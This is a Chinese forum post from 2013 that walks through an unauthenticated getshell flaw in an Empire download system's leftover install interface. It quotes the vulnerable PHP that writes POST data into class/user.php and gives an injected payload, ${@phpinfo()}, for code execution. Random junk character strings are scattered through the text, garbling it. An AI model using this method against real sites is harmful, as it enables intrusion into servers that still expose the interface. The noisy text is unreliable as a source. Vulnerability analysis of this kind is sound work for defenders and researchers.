这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们
" f- u# @* G, |. ^$ e" ~5 S( J; A# d* R. t4 P" p! j' o, C
8 t5 N# N# `! D7 C8 a这是帝国的一套下载系统 如图
% |) D. C! K2 Z ^ps(不需要任何账户和密码,直接写shell)
: ~( p2 c% w. j( U* e5 B% d, u
由于很多站是由于下载要整合discuz 等等一些论坛....' Z; O; Z# D( m- a; {$ K# g
& c- [9 o: y* X9 {. X) y, e而帝国他又有一个万能接口,如图 0 U; o% D2 `/ A4 p7 ?
; w7 |# M. k' u% P5 N/ y
. o. q4 z& v0 T: j/ _& h而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码- h R* D) r3 W2 Z) [
: v2 X# H1 N9 J$ t% X# B
当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig 1. if($_GET['install']==1) 2. { 3. @include("../class/connect.php"); 4. @include("../class/db_sql.php"); 5. @include("../class/functions.php"); 6. $link=db_connect(); 7. $empire=new mysqlquery(); 8. if($setup=="SetConfig") 9. { 10. SetUserCOMConfig($_POST); 11. } 12. elseif($setup=="alter") 13. { 14. InstallUserCOM(); 15. } 16. elseif($setup=="update") 17. { 18. UpdateUserCOM(); 19. } 20. else 21. {} 复制代码 他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪; h' T: f2 A6 O- _! D4 w+ U' L
6 E/ M# U, K8 R) D- S' ~1 I
在data/fun.php中的15行8 E, S6 e/ r) o, @$ Q
0 G4 X, j5 Y/ V9 P; |我们可以看到这个函数 1. function SetUserCOMConfig($add){ 2. $filetext=ReadFiletext('data/user.php'); 3. if(empty($filetext)) 4. { 5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.'); 6. } 7. $vr=explode(",",ReturnRepUserVar()); 8. $count=count($vr); 9. for($i=0;$i<$count;$i++) 10. { 11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext); 12. } 13. //写入配置文件 14. $fp=@fopen("../class/user.php","w"); 15. if(!$fp) 16. {5 V$ d! `& ]: ]
17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 18. } 19. @fputs($fp,$filetext); 20. @fclose($fp); 复制代码 .....//省略若干
2 }, V0 a: t) x; P4 ^( D# I4 g
7 j. C0 ?: P/ @5 [/ Z4 H. c9 k! d这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
5 s4 v2 a8 Q5 X" w9 x
5 K" M0 V- G4 f/ q# f- B他将传进来的变量进行了切割,然后赋给了$filetext! }6 I$ m$ T8 J0 c
. e4 A2 h' ~! L然后看下面 1. //写入配置文件 2. $fp=@fopen("../class/user.php","w"); 3. if(!$fp) 4. { 5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 6. } 7. @fputs($fp,$filetext); 复制代码 打开了一个class/user.php文件,然后将$filetext写入了9 \& t* f: @6 Y4 x9 ~
6 l3 Z1 {) J' u) @# M
我们看看写入的结果,随便填一个 ) s% W, ~/ }5 _# Z+ ]: K6 P
8 s2 [4 [/ ?8 w+ T c, o: M8 C3 \! \# F$ g2 e) E2 {
& E6 ?, Y- B. P' _. I3 f( M' t3 x( R L# _6 ~
( |7 s b% P. o8 [) e+ \2 W
$ ^% m8 y5 d' f
/ d4 h7 w# K7 ~: P9 Y+ j/ z1 r2 P8 T4 R
8 |+ c+ U6 \3 L5 j$ V) \$ z1 Q" k, M
5 g5 S) P4 F2 E, C
2 @0 O0 r1 L" ^' G: G' m; p; A. R0 s; P1 Y( C" i8 n
3 { R6 f, v2 x0 x u
7 u: g1 T0 d. i+ k9 L" r
' M' N7 s6 z7 {# ~, q2 t
7 B( f' z5 X% |$ o& O1 I
1 x/ a, j' E( L8 B( J
5 E5 J& a3 Q% v4 H# W2 F
L- v' ^4 e, {" n# V" M) I+ k1 ~% x
所以我们淫荡点,写个${@phpinfo()}试试 o1 V+ ?' x' S& S
然后访问以下class/user.php这个文件# S) U* m, B( B# E n0 U
日了吧
1 o3 c O* \, T1 ^
1 w u7 J0 I/ m$ D/ F7 E3 A7 \: w4 b
8 T8 j+ O8 J. ^% R8 F) ~9 z6 F% f! n( H8 X& m3 {! b
& X, p" A& d0 C8 s0 @
/ D) C. y8 V( u! G% r | 
发表于 2013-1-23 09:34:37
收藏
支持
反对